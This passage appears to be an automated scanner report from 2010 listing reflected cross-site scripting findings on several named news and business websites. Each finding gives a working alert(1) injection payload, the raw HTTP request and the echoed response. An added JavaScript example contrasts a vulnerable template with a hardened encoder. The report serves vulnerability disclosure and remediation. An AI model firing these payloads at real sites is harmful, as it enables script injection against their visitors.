Date: Sat, 11 Dec 2010 02:08:21 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1 </title><meta name ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/ny1/OnTheAir336e6';a3c60f719c7/ny1_for_you.jsp'; var gRegionSelected = '1';//]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be714'%3bb685d64afe5 was submitted in the REST URL parameter 3. This input was echoed as be714';b685d64afe5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny1/OnTheAir/ny1_for_you.jspbe714'%3bb685d64afe5 HTTP/1.1
Host: www.ny1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Sat, 11 Dec 2010 02:08:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56880
Vary: Accept-Encoding
Cache-Control: public, max-age=566
Expires: Sat, 11 Dec 2010 02:17:56 GMT
Date: Sat, 11 Dec 2010 02:08:30 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1 </title><meta name ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/ny1/OnTheAir/ny1_for_you.jspbe714';b685d64afe5/default.aspx'; var gRegionSelected = '1';//]]> ...[SNIP]...
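The three single-quoted JavaScript-string findings above differ only in what follows the closing quote: the networkworld REST parameters use '-alert(1)-' (the string is closed and alert(1) becomes an operand of a subtraction), the nic.cu opt parameter uses ';alert(1)// (the statement is terminated and the tail commented out), and the ny1 REST parameters were only confirmed with a bare ';. The script below is an added example, not code from the report or from any of the scanned sites: it renders each reflected value through a hypothetical inline-script template the way those pages did, executes the result with a stubbed alert(), and then renders the same values with a JSON-based encoder that keeps them inside the literal. The template shape, the function names and the constructed inputs (copied from the report's payloads) are assumptions.

```javascript
// Added example: breaking out of a single-quoted JavaScript string, and a safe encoder.
// The render functions are hypothetical stand-ins for the affected pages' templates;
// the inputs are constructed from the payloads shown in the report.

// nic.cu opt parameter: "';" terminates the string, "//" comments out the remainder.
const OPT_PAYLOAD = "1e2a00';alert(1)//6ba92ff6dfa";
// networkworld REST parameter: "'-" closes the string and makes alert(1) an operand.
const PATH_PAYLOAD = "/podcasts/panorama/2007/051bcd2'-alert(1)-'0ece9fb4f82/how_can_brandjacking_threaten.html";
// ny1 REST parameter: the bare terminator probe, as it appeared in currentQueryString.
const PROBE_PAYLOAD = "?404;http://www.ny1.com:80/ny1f6e01';985fa83aacf/OnTheAir/ny1_for_you.jsp";

// Vulnerable: the value is concatenated into a single-quoted literal inside an inline script.
function renderVulnerable(value) {
  return "var currentQueryString = '" + value + "';";
}

// Hardened: JSON.stringify yields a double-quoted literal with quotes, backslashes and
// control characters escaped. The extra replacements stop "</script>" or an HTML comment
// opener from ending the enclosing <script> element, and U+2028/U+2029 from ending the line.
function encodeForJsLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}
function renderHardened(value) {
  return "var currentQueryString = " + encodeForJsLiteral(value) + ";";
}

// Parses and runs a rendered script with a stubbed alert(), reporting whether alert ran,
// the final value of the variable, and the name of any parse or runtime error.
function run(script) {
  const alertCalls = [];
  const result = { alertCalls, value: undefined, error: null };
  try {
    const fn = new Function("alert", script + "\nreturn currentQueryString;");
    result.value = fn((x) => { alertCalls.push(x); });
  } catch (e) {
    result.error = e.constructor.name;
  }
  return result;
}

// Stand-alone demonstration. Expected: the opt and path payloads call alert(1) when
// rendered by the vulnerable template (value "1e2a00" and NaN respectively); the bare
// probe is a SyntaxError, because "985fa83aacf" is not valid JavaScript after the ";",
// which is why closing the string is evidence of the context but not yet a working PoC;
// the hardened template returns every value unchanged and never calls alert().
for (const [label, payload] of [["opt", OPT_PAYLOAD], ["path", PATH_PAYLOAD], ["probe", PROBE_PAYLOAD]]) {
  console.log(label, "vulnerable:", run(renderVulnerable(payload)));
  console.log(label, "hardened:  ", run(renderHardened(payload)));
}
```

The report's remediation advice still stands: the encoder above makes the literal safe only while the template keeps the value inside a JSON-style literal. Where possible, do not emit request data into script at all; put it in a data- attribute (an HTML attribute context, where HTML encoding is sufficient) and read it from the DOM with dataset.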
1.165. http://www.ny1.com/ny1/OnTheAir/ny1_for_you.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ny1.com
Path: /ny1/OnTheAir/ny1_for_you.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6169'-alert(1)-'132ff54a617 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny1/OnTheAir/ny1_for_you.jsp?a6169'-alert(1)-'132ff54a617=1 HTTP/1.1
Host: www.ny1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Sat, 11 Dec 2010 02:08:02 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=600
Expires: Sat, 11 Dec 2010 02:18:00 GMT
Date: Sat, 11 Dec 2010 02:08:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66693
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head id="ctl00_Head1"><title> NY1 For You: Don't Get Swiped When Bu ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?SectionPath=%2fcontent%2ffeatures%2fny1_for_you%2f&a6169'-alert(1)-'132ff54a617=1'; var gRegionSelected = '1';//]]> ...[SNIP]...
1.166. http://www.pcmag.com/article2/0,2817,2347163,00.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pcmag.com
Path: /article2/0,2817,2347163,00.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38acc'-alert(1)-'dec265e1b08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article2/0,2817,2347163,00.asp?38acc'-alert(1)-'dec265e1b08=1 HTTP/1.1
Host: www.pcmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 11 Dec 2010 02:07:41 GMT
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-Powered-By: ASP.NET
Vary: *
Cache-Control: public, max-age=0
Expires: Sat, 11 Dec 2010 02:07:56 GMT
Date: Sat, 11 Dec 2010 02:07:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82150
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35bd5'-alert(1)-'e792e9b86df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/171338/internet_security_trends_2009_an_interim_update.html35bd5'-alert(1)-'e792e9b86df HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D2D737CC5B3F5AC682CAE590D7AEEF50; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 11 Dec 2010 02:07:29 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" ...[SNIP]...
Logon.isValid = '' != Logon.userEmail;
/* Namespace RememberURI */ var RememberURI = new Object(); RememberURI.referer = '/article/171338/internet_security_trends_2009_an_interim_update.html35bd5'-alert(1)-'e792e9b86df'; if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) { RememberURI.query = ''; RememberURI.referer += RememberURI.query; document.cookie = "pcw.last_uri=" ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3136d'-alert(1)-'5dd4804b62f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /businesscenter/article/187449/baidu_lawsuit_registercom_rep_refused_aid_after_hack.html3136d'-alert(1)-'5dd4804b62f HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=021D6E1D6006A6161EC51E7CD684B1F5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 11 Dec 2010 02:07:41 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... = '' != Logon.userEmail;
/* Namespace RememberURI */ var RememberURI = new Object(); RememberURI.referer = '/businesscenter/article/187449/baidu_lawsuit_registercom_rep_refused_aid_after_hack.html3136d'-alert(1)-'5dd4804b62f'; if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) { RememberURI.query = ''; RememberURI.referer += RememberURI.query; document.cookie = "pcw.last_uri=" + e ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4534f"><a>2eeca12ce20 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /businesscenter/article/187449/baidu_lawsuit_registercom_rep_refused_aid_after_hack.html4534f"><a>2eeca12ce20 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CC790F93A57212884D4F8AF9DFBECDC1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 11 Dec 2010 02:07:33 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... ty/article;pg=article;aid=187449;c=1743;c=1730;c=1734;c=1730;c=2137;pos=336showcase;tile=2;sz=336x280; &url=/businesscenter/article/187449/baidu_lawsuit_registercom_rep_refused_aid_after_hack.html4534f"><a>2eeca12ce20"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 41e46<a>0d6dc089cc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news41e46<a>0d6dc089cc4/2007/08/20/drugs-bought-online-are-dangerous-says-research.asp HTTP/1.1
Host: www.pharmaceutical-int.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92dc7"><script>alert(1)</script>b920bc25a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
<script>alert(1)</script>b920bc25a6/2007/08/20/">
GET /news92dc7"><script>alert(1)</script>b920bc25a6/2007/08/20/drugs-bought-online-are-dangerous-says-research.asp HTTP/1.1
Host: www.pharmaceutical-int.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f48b2"-alert(1)-"44d66e31e4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articlesf48b2"-alert(1)-"44d66e31e4c/2009/137.html HTTP/1.1 Host: www.pharmamanufacturing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: SESS7e775296d3b39516864627b9a59fa702=b016a27b69b238a00f2c0691a6b4540c; expires=Mon, 03-Jan-2011 05:40:57 GMT; path=/; domain=.pharmamanufacturing.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:07:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22319
Date: Sat, 11 Dec 2010 02:07:37 GMT
X-Varnish: 423853120
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"> <head> <title>Ooops. The page you requested was not found.</title>
<base h ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */
if(typeof(window.put_registered) != "undefined"){ // defensive against variable not declared if(put_registered) { // fire a successful regis ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82c9f"-alert(1)-"c7e4ef4fa35 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/200982c9f"-alert(1)-"c7e4ef4fa35/137.html HTTP/1.1 Host: www.pharmamanufacturing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: SESS7e775296d3b39516864627b9a59fa702=9b45826609a87f6f25baf2f4dbed7d5a; expires=Mon, 03-Jan-2011 05:40:59 GMT; path=/; domain=.pharmamanufacturing.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:07:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22319
Date: Sat, 11 Dec 2010 02:07:39 GMT
X-Varnish: 983919490
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"> <head> <title>Ooops. The page you requested was not found.</title>
<base h ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */
if(typeof(window.put_registered) != "undefined"){ // defensive against variable not declared if(put_registered) { // fire a successful registrati ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fda80"-alert(1)-"054ade3f34a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/2009/137.htmlfda80"-alert(1)-"054ade3f34a HTTP/1.1 Host: www.pharmamanufacturing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: SESS7e775296d3b39516864627b9a59fa702=81f8f9a026bd3c43c2d0587a9653a84f; expires=Mon, 03-Jan-2011 05:41:01 GMT; path=/; domain=.pharmamanufacturing.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:07:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22319
Date: Sat, 11 Dec 2010 02:07:42 GMT
X-Varnish: 983919499
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"> <head> <title>Ooops. The page you requested was not found.</title>
<base h ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */
if(typeof(window.put_registered) != "undefined"){ // defensive against variable not declared if(put_registered) { // fire a successful registration event ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14da9<script>alert(1)</script>e6e8a23791f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pw/by-topic14da9<script>alert(1)</script>e6e8a23791f/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.html HTTP/1.1
Host: www.publishersweekly.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>/by-topic14da9<script>alert(1)</script>e6e8a23791f/digital/copyright/article/43626-googl ...[SNIP]... </HEAD> layout for /by-topic14da9<script>alert(1)</script>e6e8a23791f/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.html was not found
<!-- this page was generated by the Iowa(tm) Content Management System by Mediapolis(tm), inc. --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 5950b</title><script>alert(1)</script>b4f590d780d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pw/by-topic5950b</title><script>alert(1)</script>b4f590d780d/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.html HTTP/1.1
Host: www.publishersweekly.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>/by-topic5950b</title><script>alert(1)</script>b4f590d780d/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.html</TITLE> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 3f04a</title><script>alert(1)</script>db8b56b22e2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pw/by-topic/digital/copyright/article3f04a</title><script>alert(1)</script>db8b56b22e2/43626-google-defeats-viacom-s-1-billion-youtube-suit.html HTTP/1.1
Host: www.publishersweekly.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>/by-topic/digital/copyright/article3f04a</title><script>alert(1)</script>db8b56b22e2/43626-google-defeats-viacom-s-1-billion-youtube-suit.html</TITLE> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 79453<script>alert(1)</script>d1d8fecb99b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pw/by-topic/digital/copyright/article79453<script>alert(1)</script>d1d8fecb99b/43626-google-defeats-viacom-s-1-billion-youtube-suit.html HTTP/1.1
Host: www.publishersweekly.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>/by-topic/digital/copyright/article79453<script>alert(1)</script>d1d8fecb99b/43626-googl ...[SNIP]... </HEAD> layout for /by-topic/digital/copyright/article79453<script>alert(1)</script>d1d8fecb99b/43626-google-defeats-viacom-s-1-billion-youtube-suit.html was not found
<!-- this page was generated by the Iowa(tm) Content Management System by Mediapolis(tm), inc. --> ...[SNIP]...
The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload fd3c8</title><script>alert(1)</script>da54391ca81 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pw/by-topic/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.htmlfd3c8</title><script>alert(1)</script>da54391ca81 HTTP/1.1
Host: www.publishersweekly.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>/by-topic/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.htmlfd3c8</title><script>alert(1)</script>da54391ca81</TITLE> ...[SNIP]...
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7aca3<script>alert(1)</script>9fb72181375 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pw/by-topic/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.html7aca3<script>alert(1)</script>9fb72181375 HTTP/1.1
Host: www.publishersweekly.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>/by-topic/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit ...[SNIP]... </HEAD> layout for /by-topic/digital/copyright/article/43626-google-defeats-viacom-s-1-billion-youtube-suit.html7aca3<script>alert(1)</script>9fb72181375 was not found
<!-- this page was generated by the Iowa(tm) Content Management System by Mediapolis(tm), inc. --> ...[SNIP]...
1.181. http://www.redherring.com/Home/22604 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.redherring.com
Path:
/Home/22604
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4367"><script>alert(1)</script>89c28973b19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
<script>alert(1)</script>89c28973b19=1 HTTP/1.1">
GET /Home/22604?d4367"><script>alert(1)</script>89c28973b19=1 HTTP/1.1
Host: www.redherring.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 02:07:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: BTX_CLN=D68D15C044067578C7B42F1C778BF2C5D50B2445039D825A9E972B206B1CAD70BEBADE92FD0A07C1015814A4FD17A763E83A3B39AB66FA9A02B8EBBA8CC1FB4F45AC1E04949204B925EF8361E44D7CA7DDF4843C51F1DDFA06B440F3C795ACB056B54808D7B4A87384A3B22158804441CDAE06C5; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=edshcbatctgo3p2cjxrkwhj4; path=/; HttpOnly
Cache-Control: private
Expires: Sat, 11 Dec 2010 02:06:36 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 56073
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_headControl" ...[SNIP]... <form name="aspnetForm" method="post" action="/Home/22604?d4367"><script>alert(1)</script>89c28973b19=1" id="aspnetForm"> ...[SNIP]...
1.182. http://www.registration123.com/ICANN/GTLD/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.registration123.com
Path:
/ICANN/GTLD/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bac3"><script>alert(1)</script>8dadc6e7213 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
<script>alert(1)</script>8dadc6e7213=1 HTTP/1.1">
GET /ICANN/GTLD/?2bac3"><script>alert(1)</script>8dadc6e7213=1 HTTP/1.1
Host: www.registration123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 02:07:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=2197325;expires=Mon, 03-Dec-2040 02:07:48 GMT;path=/
Set-Cookie: CFTOKEN=38966683;expires=Mon, 03-Dec-2040 02:07:48 GMT;path=/
Set-Cookie: CFID=2197325;path=/
Set-Cookie: CFTOKEN=38966683;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D2197325%26CFTOKEN%23%3D38966683%23lastvisit%3D%7Bts%20%272010%2D12%2D10%2021%3A07%3A48%27%7D%23timecreated%3D%7Bts%20%272010%2D12%2D10%2021%3A07%3A48%27%7D%23hitcount%3D2%23cftoken%3D38966683%23cfid%3D2197325%23;expires=Mon, 03-Dec-2040 02:07:48 GMT;path=/
